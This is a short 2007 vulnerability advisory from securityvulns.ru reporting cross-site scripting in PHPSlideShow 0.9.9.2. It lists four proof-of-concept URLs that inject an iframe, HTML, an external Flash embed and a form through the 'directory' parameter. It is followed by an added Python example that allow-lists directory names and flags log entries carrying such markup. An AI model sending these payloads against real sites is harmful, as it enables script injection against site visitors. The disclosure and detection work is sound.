[EN] securityvulns.ru
From: morin.josh_(at)_gmail.com <morin.josh_(at)_gmail.com>
Date: 29.11.2007
Subject: PHPSlideShow XSS Update

Vendor Site: http://www.zinkwazi.com/wp/scripts/
Version affected: 0.9.9.2
URL: http://www.example.com/scripts/demo/phpslideshow.php?directory=photos

BID ref: 26576, by Jose Luis Góngora Fernández

PHPSlideShow is also susceptible to the following inputs:

1. http://www.yoursite.com/scripts/demo/phpslideshow.php?directory="><iframe>

2. http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<html><font color="Red"><b>Pwned</b></font></html>

3. http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<EMBED SRC="http://site.com/xss.swf"

4. http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=FORM%20ACTION=%22search.php%22%20METHOD=%22GET%22%3E


Discovered by: Joshua Morin
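As an added illustration, not part of this advisory or of the PHPSlideShow project: a defender-side check that applies a plain directory-name allow-list to the `directory` parameter and flags web-server log entries whose decoded value would have carried markup like the requests listed above. The log lines and the allow-list pattern are constructed assumptions; the advisory does not state which directory names the real script accepts.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format) modelled on the
# request shapes in the advisory plus one benign request; not real traffic.
SAMPLE_LOG = r'''
203.0.113.7 - - [29/Nov/2007:10:00:01 +0000] "GET /scripts/demo/phpslideshow.php?directory=photos HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Nov/2007:10:00:02 +0000] "GET /scripts/demo/phpslideshow.php?directory=%22%3E%3Ciframe%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Nov/2007:10:00:03 +0000] "GET /scripts/demo/phpslideshow.php?directory=%3Chtml%3E%3Cfont%20color=%22Red%22%3E%3Cb%3EPwned%3C/b%3E%3C/font%3E%3C/html%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Nov/2007:10:00:04 +0000] "GET /scripts/demo/phpslideshow.php?directory=FORM%20ACTION=%22search.php%22%20METHOD=%22GET%22%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''.strip()

# Assumed allow-list for a slideshow directory: one path segment, no separators,
# no HTML metacharacters. Rejecting early also blocks traversal such as "../".
SAFE_DIRECTORY = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# Request line inside a Common/Combined Log Format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def is_safe_directory(value: str) -> bool:
    """True only if the decoded value is a plain directory name."""
    return bool(SAFE_DIRECTORY.match(value))


def directory_params(log_text: str):
    """Yield (line number, decoded directory value) for each phpslideshow.php request."""
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if not parts.path.endswith("/phpslideshow.php"):
            continue
        # parse_qs percent-decodes, so the value is what the PHP script would see.
        for value in parse_qs(parts.query, keep_blank_values=True).get("directory", []):
            yield lineno, value


def suspicious_requests(log_text: str):
    """Return every (line number, value) whose directory value fails the allow-list."""
    return [(n, v) for n, v in directory_params(log_text) if not is_safe_directory(v)]


if __name__ == "__main__":
    for n, v in suspicious_requests(SAMPLE_LOG):
        print(f"line {n}: unsafe directory parameter {v!r}")
```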

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod